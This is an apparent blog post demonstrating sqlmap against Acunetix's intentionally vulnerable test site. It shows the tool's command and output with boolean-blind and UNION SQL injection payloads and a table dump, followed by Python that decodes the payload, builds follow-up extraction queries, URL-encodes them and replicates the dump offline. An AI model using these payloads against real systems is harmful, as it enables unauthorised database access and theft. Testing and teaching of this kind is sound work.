Wednesday, June 1, 2011

sqlmap vs Acunetix PHP testing web server (part II)

[~/Work/sqlmap/trunk/sqlmap] ./sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dump -D acuart -T categ --fresh-queries --replicate --batch

    sqlmap/1.0-dev (r4005) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 14:52:32

[14:52:32] [INFO] using '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/testphp.vulnweb.com/session' as session file
[14:52:32] [INFO] resuming injection data from session file
[14:52:32] [INFO] resuming back-end DBMS 'mysql 5' from session file
[14:52:32] [INFO] testing connection to the target url
[14:52:32] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: artist
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 472=472 

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: artist=-9746 UNION ALL SELECT NULL, CONCAT(CHAR(58,115,118,111,58),CHAR(108,70,118,105,102,97,88,65,72,101),CHAR(58,98,108,102,58)), NULL#
---

[14:52:32] [INFO] manual usage of GET payloads requires url encoding
[14:52:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[14:52:32] [INFO] fetching columns for table 'categ' on database 'acuart'
[14:52:32] [INFO] the SQL query used returns 3 entries
[14:52:32] [INFO] retrieved: "cdesc","tinytext"
[14:52:33] [INFO] retrieved: "cname","varchar(50)"
[14:52:33] [INFO] retrieved: "cat_id","int(5)"
[14:52:33] [INFO] fetching entries for table 'categ' on database 'acuart'
[14:52:33] [INFO] the SQL query used returns 4 entries
[14:52:33] [INFO] retrieved: "Lorem ipsum dolor sit amet, consectetuer adipis...
[14:52:33] [INFO] retrieved: "Lorem ipsum dolor sit amet, consectetuer adipis...
[14:52:33] [INFO] retrieved: "Lorem ipsum dolor sit amet, consectetuer adipis...
Database: acuart
Table: categ
[4 entries]
+--------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-----------+
| cat_id | cdesc                                                                                                                                                                                                                                                              | cname     |
+--------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-----------+
| 2      | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n    Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis\n    nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\n    Cras venenati | Paintings |
| 1      | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n    Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis\n    nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\n    Cras venenati | Posters   |
| 4      | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n    Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis\n    nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\n    Cras venenati | Graffity  |
| 3      | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n    Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis\n    nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\n    Cras venenati | Stickers  |
+--------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-----------+

[14:52:33] [INFO] Table 'acuart.categ' dumped to sqlite3 file '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/testphp.vulnweb.com/dump/acuart.sqlite3'
[14:52:33] [INFO] Fetched data logged to text files under '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/testphp.vulnweb.com'

[*] shutting down at: 14:52:33
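The UNION payload in the output above is worth unpicking. The CHAR() calls exist only so that no quote character has to appear in the request: CHAR(58,115,118,111,58) evaluates to ':svo:', CHAR(58,98,108,102,58) to ':blf:', and the random string between them is what sqlmap looks for in the response to learn which column is reflected. Once that is known, the same two markers are wrapped around the real column expression and the answer is cut out of the HTML between them. The Python below is an added example, not code from this post or from sqlmap itself: it decodes the payload, URL-encodes it for manual use (the "manual usage of GET payloads requires url encoding" line), and extracts marked values from response bodies that are constructed here for illustration. The data_payload() helper shows the shape of the follow-up query and is this example's own, not sqlmap's query builder.

```python
# Added example (not from the original post and not sqlmap's own code):
# decode the UNION payload sqlmap printed, URL-encode it for manual use and
# cut marked values out of (constructed) response bodies.
import re
from urllib.parse import quote

# The UNION payload exactly as sqlmap reported it for the 'artist' parameter.
PAYLOAD = ("-9746 UNION ALL SELECT NULL, CONCAT(CHAR(58,115,118,111,58),"
           "CHAR(108,70,118,105,102,97,88,65,72,101),CHAR(58,98,108,102,58)), NULL#")

CHAR_CALL = re.compile(r"CHAR\(([\d, ]+)\)")


def char_call_to_str(call):
    """Evaluate one MySQL CHAR(n,n,...) call to the string it produces."""
    m = CHAR_CALL.fullmatch(call)
    return "".join(chr(int(n)) for n in m.group(1).split(","))


def str_to_char_call(text):
    """Inverse of char_call_to_str: spell text as CHAR(...) so no quotes are needed."""
    return "CHAR(" + ",".join(str(ord(c)) for c in text) + ")"


def decode_char_calls(sql):
    """Rewrite every CHAR(...) call in sql as a quoted literal, for reading."""
    return CHAR_CALL.sub(lambda m: "'" + char_call_to_str(m.group(0)) + "'", sql)


def markers(payload):
    """Return the (start, stop) delimiters the payload wraps its value in:
    the first and the last CHAR() call of the CONCAT."""
    parts = [char_call_to_str(m.group(0)) for m in CHAR_CALL.finditer(payload)]
    return parts[0], parts[-1]


def data_payload(column_expr, start, stop):
    """Same UNION shape with a real column expression in the reflected column.
    Illustrative only (assumption of this example, not sqlmap's builder):
    a NULL in column_expr would null the whole CONCAT, which is why a real
    tool wraps the expression, e.g. IFNULL(CAST(col AS CHAR),CHAR(32))."""
    return (f"-9746 UNION ALL SELECT NULL, CONCAT({str_to_char_call(start)},"
            f"{column_expr},{str_to_char_call(stop)}), NULL#")


def encode_get(param, payload):
    """URL-encode a GET payload for manual use: spaces, commas, parentheses and
    the trailing '#' would otherwise be mangled or dropped by the client."""
    return f"{param}={quote(payload, safe='')}"


def extract(body, start, stop):
    """Cut every value found between the delimiters out of a response body."""
    pattern = re.escape(start) + r"(.*?)" + re.escape(stop)
    return re.findall(pattern, body, re.DOTALL)


if __name__ == "__main__":
    print(decode_char_calls(PAYLOAD))
    start, stop = markers(PAYLOAD)
    print(encode_get("artist", data_payload("cname", start, stop)))
    # Constructed response body, as the target page might echo the column.
    print(extract("<td>:svo:Paintings:blf:</td><td>:svo:Posters:blf:</td>", start, stop))
```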

[~/Work/sqlmap/trunk/sqlmap] sqlite3 /home/stamparm/Work/sqlmap/trunk/sqlmap/output/testphp.vulnweb.com/dump/acuart.sqlite3
SQLite version 3.7.4
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> SELECT * FROM categ;
2|Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.
    Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis
    nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.
    Cras venenati|Paintings
1|Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.
    Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis
    nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.
    Cras venenati|Posters
4|Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.
    Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis
    nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.
    Cras venenati|Graffity
3|Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.
    Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis
    nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.
    Cras venenati|Stickers
sqlite>
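What --replicate writes is an ordinary SQLite database, so anything that can open one can work on the dump offline instead of re-running the injection against the target. The script below is an added example, not part of this post and not sqlmap's own --replicate implementation: it rebuilds acuart.categ from the rows shown above in an in-memory database (pass a file path instead of ':memory:' to get a file like acuart.sqlite3) and runs the same kind of query the sqlite3 session does. The MySQL-to-SQLite type mapping in sqlite_type() is a simplification assumed by this example, not sqlmap's mapping.

```python
# Added example (not from the original post and not sqlmap's --replicate code):
# rebuild the acuart.categ dump as a SQLite database and query it offline.
import re
import sqlite3

# Columns and types exactly as sqlmap retrieved them for acuart.categ.
COLUMNS = [("cat_id", "int(5)"), ("cdesc", "tinytext"), ("cname", "varchar(50)")]

# The four dumped rows; cdesc is identical in every row and keeps the literal
# newlines and indentation that the sqlite3 output above shows.
CDESC = ("Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n"
         "    Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis\n"
         "    nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\n"
         "    Cras venenati")
ROWS = [(2, CDESC, "Paintings"), (1, CDESC, "Posters"),
        (4, CDESC, "Graffity"), (3, CDESC, "Stickers")]


def sqlite_type(mysql_type):
    """Map a MySQL column type to a SQLite storage class.
    Simplified mapping assumed by this example; length/precision are dropped."""
    base = re.match(r"[a-z]+", mysql_type.lower()).group(0)
    if base in ("tinyint", "smallint", "mediumint", "int", "integer", "bigint"):
        return "INTEGER"
    if base in ("float", "double", "decimal", "numeric"):
        return "REAL"
    if base in ("blob", "tinyblob", "mediumblob", "longblob", "binary", "varbinary"):
        return "BLOB"
    return "TEXT"


def replicate(conn, table, columns, rows):
    """Create `table` with the mapped column types, load the fetched rows and
    return the row count.  Identifiers are double-quoted, values are bound."""
    cols = ", ".join(f'"{name}" {sqlite_type(typ)}' for name, typ in columns)
    conn.execute(f'CREATE TABLE IF NOT EXISTS "{table}" ({cols})')
    placeholders = ", ".join("?" for _ in columns)
    conn.executemany(f'INSERT INTO "{table}" VALUES ({placeholders})', rows)
    conn.commit()
    return conn.execute(f'SELECT count(*) FROM "{table}"').fetchone()[0]


def build_replica(path=":memory:"):
    """Open (or create) the replica database and load acuart.categ into it."""
    conn = sqlite3.connect(path)
    replicate(conn, "categ", COLUMNS, ROWS)
    return conn


def category_names(conn):
    """The kind of query a tester runs on the replica instead of re-injecting it."""
    return [r[0] for r in conn.execute("SELECT cname FROM categ ORDER BY cat_id")]


def schema(conn, table):
    """(name, declared type) for each column, as stored in the replica."""
    return [(r[1], r[2]) for r in conn.execute(f'PRAGMA table_info("{table}")')]


if __name__ == "__main__":
    db = build_replica()
    print(schema(db, "categ"))
    print(category_names(db))
```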
